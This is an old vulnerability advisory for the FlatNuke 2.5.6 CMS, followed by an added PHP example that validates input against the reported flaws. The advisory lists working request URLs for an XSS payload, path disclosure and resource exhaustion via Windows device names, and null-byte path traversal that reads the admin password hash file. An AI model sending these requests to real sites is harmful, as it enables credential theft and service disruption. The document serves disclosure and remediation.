Flatnuke 2.5.6 Underlying system information disclosure / Administrative & users credentials disclosure / cross site scripting / path disclosure / resource consumption poc

(tested on Windows)

software:
site: http://flatnuke.sourceforge.net/flatnuke/

1) cross site scripting:

http://[target]/[path]/forum/index.php?op=vis_reg&usr="><script>alert('LOL%20%20')</script><!--

2) path disclosure:

2.a) http://[target]/[path]/print.php?news=com1%00&mod=whatever

and so on calling MS-DOS reserved device name for news parameter...

2.b) http://[target]/[path]/index.php?mod=read&id=whatever

3) resource consumption:

on Windows:

http://[target]/[path]/print.php?news=con%00&mod=ciao
http://[target]/[path]/index.php?mod=read&id=../forum/users/con%00

4) a user can retrieve any file on target system using null byte (%00),
example admin MD5 password hash disclosure:

http://[target]/[path]/index.php?mod=read&id=../forum/users/admin.php%00

generally:

http://[target]/[path]/index.php?mod=read&id=../forum/users/[user].php%00

rgod
site: http://rgod.altervista.org
mail: retrogod@xxxxxxxxxxxxx
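
One way to validate the `id` / `news` values behind issues 2 to 4 before they reach a filesystem call, as an added example (not FlatNuke's own code and not part of the original advisory). The function name `resolve_content_id`, the `.txt` suffix and the directory layout are assumptions made for illustration.

```php
<?php
// Added example, not FlatNuke code. Names, suffix and layout are hypothetical.
ini_set('display_errors', '0');   // path disclosure: keep PHP warnings out of responses

// Windows reserved device names (CON, COM1, ...), with or without an extension.
const RESERVED_DEVICES = '/^(con|prn|aux|nul|com[1-9]|lpt[1-9])(\..*)?$/i';

/**
 * Map a user-supplied identifier to a file inside $baseDir.
 * Returns the absolute path, or null when the value must be rejected.
 */
function resolve_content_id(string $id, string $baseDir, string $ext = '.txt'): ?string
{
    // NUL byte: older PHP releases handed the string to C file APIs, which stop
    // at \0, so an appended suffix was silently dropped ("admin.php\0" . ".txt").
    if (strpos($id, "\0") !== false) {
        return null;
    }
    // Allow-list: one plain name, no dots, slashes or backslashes, so "../" cannot occur.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $id)) {
        return null;
    }
    // Device names: opening CON or COM1 on Windows can block the request or raise
    // a warning that reveals the install path.
    if (preg_match(RESERVED_DEVICES, $id)) {
        return null;
    }
    // Containment: the resolved file must exist and sit directly under the base directory.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $id . $ext);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temp directory stands in for the content directory, and the
// inputs are the decoded parameter values from the requests listed above.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'fn_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'welcome.txt', 'hello');
$samples = ['welcome', "../forum/users/admin.php\0", "com1\0", 'con', '../forum/users/con'];
foreach ($samples as $id) {
    $verdict = resolve_content_id($id, $dir) === null ? 'rejected' : 'served';
    printf("%-32s => %s\n", addcslashes($id, "\0"), $verdict);
}
```

Only `welcome` resolves to a file; every value taken from the advisory is rejected before any file is opened.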